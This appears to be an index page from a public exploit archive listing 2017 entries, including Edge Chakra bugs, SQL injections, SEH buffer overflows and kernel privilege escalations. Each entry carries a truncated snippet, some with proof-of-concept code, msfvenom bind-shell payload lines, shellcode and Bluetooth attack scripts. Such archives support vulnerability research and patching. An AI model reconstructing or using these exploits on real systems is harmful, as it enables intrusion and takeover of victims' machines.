Microsoft Edge Chakra - Incorrect JIT Optimization with TypedArray Setter #2
a0 = ; return 0; ; a0.toString; main; I just changed "var b = new Uint32Array100;" to "var b = new Uint32Array0;", and it worked well. PoC: -- 'use strict'; function funca, b, c a0 = 1.2; b0 = c; a1 = 2.2; a0 = 2.3023e-320; function main var a = 1.1, 2.2; var b = new Uint32Array0; // 0 // force t...
Doctor Patient Project 1.0 - SQL Injection
Exploit Title: Doctor Patient Project 1.0 - Multiple Vulnerabilities Dork: N/A Date: 17.08.2017 Vendor Homepage : http://surajkumar.in/ Software Link: http://surajkumar.in/product/doctor-patient-project-php/ Demo: http://surajkumar.in/ Version: 1.0 Category: Webapps Tested on: WiN7x64/KaLiLinuXx6...
Microsoft Edge Chakra - NULL Pointer Dereference
spreadIndices = nullptr // This function emits the arguments for a call. // ArgOut's with uses immediately following defs. EmitArgListStartthisLocation, byteCodeGenerator, funcInfo, callSiteId; Js::RegSlot evalLocation = Js::Constants::NoRegister; // // If Emitting arguments for eval and assignin...
Microsoft Edge Chakra - 'EmitNew' Integer Overflow
sxCall.argCount; argCount++; // include "this" BOOL fSideEffectArgs = FALSE; unsigned int tmpCount = CountArgumentspnode-sxCall.pnodeArgs, &fSideEffectArgs; AssertargCount == tmpCount; if argCount != Js::ArgSlotargCount Js::Throw::OutOfMemory; ... "Js::ArgSlot" is a 16 bit unsigned integer type...
Microsoft Edge Chakra - Uninitialized Arguments (2)
void Parser::ParseFncFormalsParseNodePtr pnodeFnc, ParseNodePtr pnodeParentFnc, ushort flags ... if IsES6DestructuringEnabled && IsPossiblePatternStart ... // Instead of passing the STFormal all the way on many methods, it seems it is better to change the symbol type afterward. for ParseNodePtr...
Microsoft Edge Chakra - 'TryUndeleteProperty' Incorrect Usage (Denial of Service)
::NoSlots return false; propertyIndex = deletedPropertyIndex; deletedPropertyIndex = staticcastTaggedInt::ToInt32object-GetSlotdeletedPropertyIndex; return true; bool SimpleDictionaryUnorderedTypeHandle::TryUndeleteProperty DynamicObject const object, const TPropertyIndex existingPropertyIndex,...
Microsoft Edge Chakra - Heap Buffer Overflow
IsCoroutine ... else InterpreterStackFrame::Setup setupfunction, args; sizet varAllocCount = setup.GetAllocationVarCount; //printf"varAllocCount: %d%X\r\n", varAllocCount, varAllocCount; sizet varSizeInBytes = varAllocCount sizeofVar; // // Allocate a new InterpreterStackFrame instance on the...
Apple macOS Sierra 10.12.3 - 'IOFireWireFamily-null-deref' FireWire Port Denial of Service
/ IOFireWireFamily-null-deref.c Brandon Azad NULL pointer dereference in IOFireWireUserClient::setAsyncRefIsochChannelForceStop. Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44236.zip / include int main int ret = 0; ioservicet service =...
RPi Cam Control < 6.3.14 - Multiple Vulnerabilities
Exploit Title: RPi Cam Control = v6.3.14 RCE Multiple Vulnerabilities - preview.php Date: 16/08/2017 Exploit Author: Alexander Korznikov Vendor Homepage: https://github.com/silvanmelchior/RPiCamWebInterface Software Link: https://github.com/silvanmelchior/RPiCamWebInterface Version: = v6.3.14 Dat...
Microsoft Edge 38.14393.1066.0 - 'CInputDateTimeScrollerElement::_SelectValueInternal' Out-of-Bounds Read
input:focus transform: scale10; UpdateSelectedthis-arrayatoffset0xB8this-indexatoffset0xD4.ptratindex0, ...; ... The problem is that the index in the PoC has unsigned 32-bit value of 0xffffffff, possibly because the data structure has not been properly initialized, which leads to out-of-bound...
AdvanDate iCupid Dating Software 12.2 - SQL Injection
Exploit Title: iCupid Dating Software 12.2 - SQL Injection Dork: N/A Date: 15.08.2017 Vendor Homepage : https://www.advandate.com/ Software Link: https://www.advandate.com/dating-software-features/ Demo: https://demo.advandate.com/ Version: 12.2 Category: Webapps Tested on: WiN7x64/KaLiLinuXx64...
ClipBucket 2.8.3 - Multiple Vulnerabilities
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ .:. Exploit Title ClipBucket 2.8.3 - Multiple Vulnerabilities .:. Google Dorks .:. "Forged by ClipBucket" inurl:viewcollection.php?cid= .:. Date: August 15, 2017 .:. Exploit Author: bRpsd .:. Skype contact: vegno...
Internet Download Manager 6.28 Build 17 - Local Buffer Overflow (SEH Unicode)
!/usr/bin/python Exploit Title: Internet Download Manager 6.28 Build 17 - 'Find file' SEH Buffer Overflow Unicode Date: 14-06-2017 Exploit Author: f3ci Tested on: Windows 7 SP1 x86 How to exploit: Open IDM - Downloads - Find - paste exploit string into 'Find file' text field msfvenom -p...
ALLPlayer 7.4 - Local Buffer Overflow (SEH Unicode)
!/usr/bin/python Exploit Title: ALL Player v7.4 SEH Buffer Overflow Unicode Version: 7.4 Date: 15-08-2017 Exploit Author: f3ci Tested on: Windows 7 SP1 x86 head = "http://" seh = "\x0f\x47" 0x0047000f nseh = "\x61\x41" popad align junk = "\x41" 301 junk2 = "\x41" 45 msfvenom -p windows/shellbindt...
Quali CloudShell 7.1.0.6508 (Patch 6) - Persistent Cross-Site Scripting
Vulnerability type: Multiple Stored Cross Site Scripting Vendor: Quali Product: CloudShell Affected version: v7.1.0.6508 Patch 6 Patched version: v8 and up Credit: Benjamin Lee CVE ID: CVE-2017-9767 ========================================================== Overview Quali CloudShell v7.1.0.6508...
RPi Cam Control < 6.3.14 - Remote Command Execution
RPi Cam Control = v6.3.14 RCE preview.php Multiple Vulnerabilities A web interface for the RPi Cam Vendor github: https://github.com/silvanmelchior/RPiCamWebInterface Date 16/08/2017 Discovered by @nopernik https://www.linkedin.com/in/nopernik http://www.korznikov.com RPi Cam Control = v6.3.14 is...
Xamarin Studio for Mac 6.2.1 (build 3) / 6.3 (build 863) - Local Privilege Escalation
Source: https://www.securify.nl/advisory/SFY20170403/xamarin-studio-for-mac-api-documentation-update-affected-by-local-privilege-escalation.html Abstract Xamarin Studio is an Integrated Development Environment IDE used to create iOS, Mac and Android applications. Xamarin Studio supports...
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP)
// A proof-of-concept local root exploit for CVE-2017-1000112. // Includes KASLR and SMEP bypasses. No SMAP bypass. // Tested on Ubuntu trusty 4.4.0- and Ubuntu xenial 4-8-0- kernels. // // EDB Note: Also included the work from...
Tomabo MP4 Converter 3.19.15 - Denial of Service
!/usr/bin/python Exploit Title: Tomabo MP4 Converter DOS Date: 13/08/17 Exploit Author: Andy Bowden Vendor Homepage: http://www.tomabo.com/ Software Link: http://www.tomabo.com/mp4-converter/index.html Version: 3.19.15 Tested on: Windows 7 x86 CVE : None Generate a .m3u file using the python scri...
RealTime RWR-3G-100 Router - Cross-Site Request Forgery (Change Admin Password)
!---Enable...
AirMaster 3000M - Multiple Vulnerabilities
?php Exploit Title: AirMaster 3000M multiple Vulnerabilities Date: 2017/08/12 Exploit Author: Koorosh Ghorbani Author Homepage: http://8thbit.net/ Vendor Homepage: http://mobinnet.ir/ Software Version: V2.0.1B1044 Web Server: GoAhead-Webs/2.5.0 define'isDebug',false; define'specialCookie','Cookie...
De-Journal 1.0 - SQL Injection
Exploit Title: De-Journal - Academic Journal and Peer Review System 1.0 - SQL Injection Dork: N/A Date: 11.08.2017 Vendor Homepage : https://sarutech.com/ Software Link: https://codecanyon.net/item/dejournal-academic-journal-and-peer-review-system/19533981 Demo: https://demo.sarutech.com/dejourna...
DeWorkshop 1.0 - SQL Injection
Exploit Title: De-Workshop - Auto Workshop Portal 1.0 - SQL Injection Dork: N/A Date: 11.08.2017 Vendor Homepage : https://sarutech.com/ Software Link: https://codecanyon.net/item/deworkshop-auto-workshop-portal/20336737 Demo: https://demo.sarutech.com/deworkshop/ Version: 1.0 Category: Webapps...
De-Tutor 1.0 - SQL Injection
Exploit Title: De-Tutor - Private Tutoring and Admission Processing 1.0 - SQL Injection Dork: N/A Date: 11.08.2017 Vendor Homepage : https://sarutech.com/ Software Link: https://codecanyon.net/item/detutor-private-tutoring-and-admission-processing/19053430 Demo: https://demo.sarutech.com/detutor/...
Microsoft Edge 38.14393.1066.0 - 'textarea.defaultValue' Memory Disclosure
var n = 0; function go document.addEventListener"DOMNodeRemoved", eventhandler; eventhandler; function eventhandler n++; ifn==5 return; //prevent going into an infinite recursion t.defaultValue = "aaaaaaaaaaaaaaaaaaaa"; f.reset; aaa !-- ========================================= This seems to be t...
Red-Gate SQL Monitor < 3.10 / 4.2 - Authentication Bypass
Exploit Title: Red-Gate SQL Monitor authentication bypass Version: Redgate SQL Monitor before 3.10 and 4.x before 4.2 Date: 2017-08-10 Red-Gate made a security announcement and publicly released the fixed version more than two years before this exploit was published Vendor Advisory:...
Piwigo Plugin User Tag 0.9.0 - Cross-Site Scripting
Exploit Title: Piwigo plugin User Tag , Persistent XSS Date: 10 Aug, 2017 Extension Version: 0.9.0 Software Link: http://piwigo.org/basics/downloads Extension link : http://piwigo.org/ext/extensionview.php?eid=441 Exploit Author: Touhid M.Shaikh Contact: http://twitter.com/touhidshaikh22 Website:...
GIF Collection 2.0 - SQL Injection
Exploit Title: GIF Collection 2.0 - SQL Injection Dork: N/A Date: 10.08.2017 Vendor Homepage : http://www.scriptfolder.com/ Software Link: http://www.scriptfolder.com/scriptfolder-gif-collection-2-0/ Demo: http://gif2.scriptfolder.com/ Version: 2.0 Category: Webapps Tested on: WiN7x64/KaLiLinuXx6...
ImageBay 1.0 - SQL Injection
Exploit Title: ImageBay 1.0 - SQL Injection Dork: N/A Date: 10.08.2017 Vendor Homepage : http://www.scriptfolder.com/ Software Link: http://www.scriptfolder.com/imagebay-publish-or-share-photography-and-pictures/ Demo: http://imagebay.scriptfolder.com/ Version: 1.0 Category: Webapps Tested on:...
WebFile Explorer 1.0 - Arbitrary File Download
Exploit Title: WebFile Explorer 1.0 - Arbitrary File Download Dork: N/A Date: 09.08.2017 Vendor Homepage : http://speicher.host/ Software Link: https://codecanyon.net/item/webfile-explorer/20366192/ Demo: http://speicher.host/envato/codecanyon/demo/web-file-explorer/ Version: 1.0 Category: Webapp...
Symantec Messaging Gateway < 10.6.3-267 - Cross-Site Request Forgery
Exploit Title: CSRF Date: August 9, 2017 Software Link: https://www.symantec.com/products/messaging-gateway Exploit Author: Dhiraj Mishra Contact: http://twitter.com/mishradhiraj Website: http://datarift.blogspot.in/ CVE: CVE-2017-6328 Category: Symantec Messaging Gateway 1. Description The...
NoMachine 5.3.9 - Local Privilege Escalation
""" Exploit Title: NoMachine LPE - Local Privilege Escalation Date: 09/08/2017 Exploit Author: Daniele Linguaglossa Vendor Homepage: https://www.nomachine.com Software Link: https://www.nomachine.com Version: 5.3.9 Tested on: OSX CVE : CVE-2017-12763 NoMachine uses a file called nxexec in order t...
DALIM SOFTWARE ES Core 5.0 build 7184.1 - Directory Traversal
DALIM SOFTWARE ES Core 5.0 build 7184.1 Multiple Remote File Disclosures Vendor: Dalim Software GmbH Product web page: https://www.dalim.com Affected version: ES/ESPRiT 5.0 build 7184.1 build 7163.2 build 7163.0 build 7135.0 build 7114.1 build 7114.0 build 7093.1 build 7093.0 build 7072.0 build...
DALIM SOFTWARE ES Core 5.0 build 7184.1 - User Enumeration
!/usr/bin/env python DALIM SOFTWARE ES Core 5.0 build 7184.1 User Enumeration Weakness Vendor: Dalim Software GmbH Product web page: https://www.dalim.com Affected version: ES/ESPRiT 5.0 build 7184.1 build 7163.2 build 7163.0 build 7135.0 build 7114.1 build 7114.0 build 7093.1 build 7093.0 build...
DALIM SOFTWARE ES Core 5.0 build 7184.1 - Cross-Site Scripting / Cross-Site Request Forgery
!-- DALIM SOFTWARE ES Core 5.0 build 7184.1 Multiple Stored XSS And CSRF Vulnerabilities Vendor: Dalim Software GmbH Product web page: https://www.dalim.com Affected version: ES/ESPRiT 5.0 build 7184.1 build 7163.2 build 7163.0 build 7135.0 build 7114.1 build 7114.0 build 7093.1 build 7093.0 buil...
Android Bluetooth - 'Blueborne' Information Leak (1)
from pwn import import bluetooth if not 'TARGET' in args: log.info'Usage: python CVE-2017-0781.py TARGET=XX:XX:XX:XX:XX:XX' exit target = args'TARGET' count = 30 Amount of packets to send port = 0xf BTPSMBNEP context.arch = 'arm' BNEPFRAMECONTROL = 0x01 BNEPSETUPCONNECTIONREQUESTMSG = 0x01 def...
DALIM SOFTWARE ES Core 5.0 build 7184.1 - Server-Side Request Forgery
DALIM SOFTWARE ES Core 5.0 build 7184.1 Server-Side Request Forgery Vendor: Dalim Software GmbH Product web page: https://www.dalim.com Affected version: ES/ESPRiT 5.0 build 7184.1 build 7163.2 build 7163.0 build 7135.0 build 7114.1 build 7114.0 build 7093.1 build 7093.0 build 7072.0 build 7051.3...
VMware WorkStation 12.5.5 - Virtual Machine Escape
VMware Escape Exploit VMware Escape Exploit before VMware WorkStation 12.5.5 Host Target: Win10 x64 Compiler: VS2013 Test on VMware 12.5.2 build-4638234 Known issues Failing to heap manipulation causes host process crash. Not quite elaborate because I'm not good at doing heap "fengshui" on Windows...
Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098) (2)
Sources: - https://github.com/sensepost/gdi-palettes-exp - https://sensepost.com/blog/2017/abusing-gdi-objects-for-ring0-primitives-revolution/ Windows 7 SP1 x86 exploit presented at DEF CON 25 involving the abuse of a newly discovered GDI object abuse technique. DC25 5A1F - Demystifying Windows...
Unitrends UEB 9.1 - 'Unitrends bpserverd' Remote Command Execution
Exploit Title: Unauthenticated root RCE for Unitrends UEB 9.1 Date: 08/08/2017 Exploit Authors: Jared Arave, Cale Smith, Benny Husted Contact: https://twitter.com/iotennui || https://twitter.com/BennyHusted || https://twitter.com/0xC413 Vendor Homepage: https://www.unitrends.com/ Software Link:...
Unitrends UEB 9.1 - Privilege Escalation
Exploit Title: Authenticated lowpriv RCE for Unitrends UEB 9.1 Date: 08/08/2017 Exploit Authors: Benny Husted, Jared Arave, Cale Smith Contact: https://twitter.com/iotennui || https://twitter.com/BennyHusted || https://twitter.com/0xC413 Vendor Homepage: https://www.unitrends.com/ Software Link:...
Synology Photo Station 6.7.3-3432 / 6.3-2967 - Remote Code Execution
''' Source: https://blogs.securiteam.com/index.php/archives/3356 Vulnerability details The remote code execution is a combination of 4 different vulnerabilities: Upload arbitrary files to the specified directories Log in with a fake authentication mechanism Log in to Photo Station with any identi...
WildMIDI 0.4.2 - Multiple Vulnerabilities
wildmidi multiple vulnerabilities ================ Author : qflb.wu =============== Introduction: ============= WildMIDI is a simple software midi player which has a core softsynth library that can be used with other applications. The WildMIDI library uses Gravis Ultrasound patch files to convert...
Unitrends UEB 9.1 - Authentication Bypass / Remote Command Execution
Exploit Title: Unauthenticated root RCE for Unitrends UEB 9.1 Date: 08/08/2017 Exploit Authors: Cale Smith, Benny Husted, Jared Arave Contact: https://twitter.com/iotennui || https://twitter.com/BennyHusted || https://twitter.com/0xC413 Vendor Homepage: https://www.unitrends.com/ Software Link:...
WordPress Plugin Easy Modal 2.0.17 - SQL Injection
DefenseCode ThunderScan SAST Advisory WordPress Easy Modal Plugin Multiple Security Vulnerabilities Advisory ID: DC-2017-01-007 Advisory Title: WordPress Easy Modal Plugin Multiple Vulnerabilities Advisory URL: http://www.defensecode.com/advisories.php Software: WordPress Easy Modal plugin...
Linux x86 - /bin/sh Shellcode (24 bytes)
Linux x86 - /bin/sh Shellcode 24 bytes. Shellcode exploit for Linux x86 platform / ;Title: Linux/x86 - /bin/sh Shellcode ;Author: Touhid M.Shaikh ;Contact: https://github.com/touhidshaikh ;Category: Shellcode ;Architecture: Linux x86 ;Description: This shellcode is based on the stack method to execute...
Microsoft Windows - '.LNK' Shortcut File Code Execution
!/usr/bin/python -- coding: utf-8 -- Title : CVE-2017-8464 | LNK Remote Code Execution Vulnerability CVE : 2017-8464 Authors : ykoster, nixawk Notice : Only for educational purposes. Support : python2 import struct def generateSHELLLINKHEADER: | | | | | | | | | | | | | | | | | | | | | | | | | | |...
Technicolor TC7337 - 'SSID' Persistent Cross-Site Scripting
// Device : Technicolor TC7337 // Vulnerable URL : https://your.rou.ter.ip/wlscanresults.html // XSS through SSID : ' Exactly 32 bytes uu // ^ // 5char domains are running | 'src' does not require quotes , and passing the URL with only '//' // out, grab yours ! +--- it will cause the browser to...
Tiandy IP Cameras 5.56.17.120 - Sensitive Information Disclosure
Vulnerability Summary The following advisory describes sensitive information Disclosure found in Tiandy IP cameras version 5.56.17.120 Tianjin Tiandy Digital Technology Co., Ltd Tiandy Tech is “one of top 10 leading CCTV manufacturer in China and a global supplier of advanced video surveillance...
VirtualBox 5.1.22 - Windows Process DLL UNC Path Signature Bypass Privilege Escalation
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1296 VirtualBox: Windows Process DLL UNC Path Signature Bypass EoP Platform: VirtualBox v5.1.22 r115126 x64 Tested on Windows 10 Class: Elevation of Privilege Summary: The process hardening implemented by the VirtualBox driver can ...